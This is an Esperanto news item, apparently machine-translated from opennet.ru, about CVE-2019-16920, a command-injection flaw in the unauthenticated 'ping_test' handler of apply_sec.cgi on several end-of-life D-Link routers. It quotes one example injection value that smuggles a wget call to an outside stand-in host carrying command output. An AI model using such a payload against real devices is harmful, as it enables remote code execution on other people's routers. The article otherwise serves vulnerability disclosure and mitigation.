Malproksime ekspluatebla vundebleco en D-Link-enkursigiloj

En D-Link sendrataj enkursigiloj identigita danĝera vundebleco (CVE-2019–16920), kiu ebligas al vi malproksime ekzekuti kodon ĉe la aparato sendante specialan peton al la prizorganto "ping_test", alirebla sen aŭtentigo.

Kurioze, laŭ la programistoj de firmware, la alvoko "ping_test" devus esti efektivigita nur post aŭtentigo, sed fakte ĝi estas nomita ĉiukaze, sendepende de ensaluti en la retinterfaco. Precipe, kiam oni aliras la skripton apply_sec.cgi kaj pasas la parametron "action=ping_test", la skripto redirektas al la aŭtentikiga paĝo, sed samtempe plenumas la agon asociitan kun ping_test. Por ekzekuti la kodon, alia vundebleco estis uzita en ping_test mem, kiu vokas la ping-servaĵon sen konvene kontroli la ĝustecon de la IP-adreso sendita por testado. Ekzemple, por voki la wget-utilon kaj transdoni la rezultojn de la komando "echo 1234" al ekstera gastiganto, simple specifu la parametron "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://". test.test/?$( eĥo 1234)".

Malproksime ekspluatebla vundebleco en D-Link-enkursigiloj

La ĉeesto de la vundebleco estis oficiale konfirmita en la sekvaj modeloj:

  • DIR-655 kun firmware 3.02b05 aŭ pli malnova;
  • DIR-866L kun firmvaro 1.03b04 aŭ pli malnova;
  • DIR-1565 kun firmware 1.01 aŭ pli malnova;
  • DIR-652 (neniaj informoj pri problemaj firmware-versioj estas provizitaj)

La subtena periodo por ĉi tiuj modeloj jam eksvalidiĝis, do D-Link deklaris, kiu ne liberigos ĝisdatigojn por ili por forigi la vundeblecon, ne rekomendas uzi ilin kaj konsilas anstataŭigi ilin per novaj aparatoj. Kiel sekureca solvo, vi povas limigi aliron al la retinterfaco nur al fidindaj IP-adresoj.

Estis poste malkovrite ke la vundebleco estis ankaŭ influas modeloj DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 kaj DIR-825, planoj por publikigado de ĝisdatigoj por kiuj ankoraŭ ne estas konataj.

fonto: opennet.ru

Aldoni komenton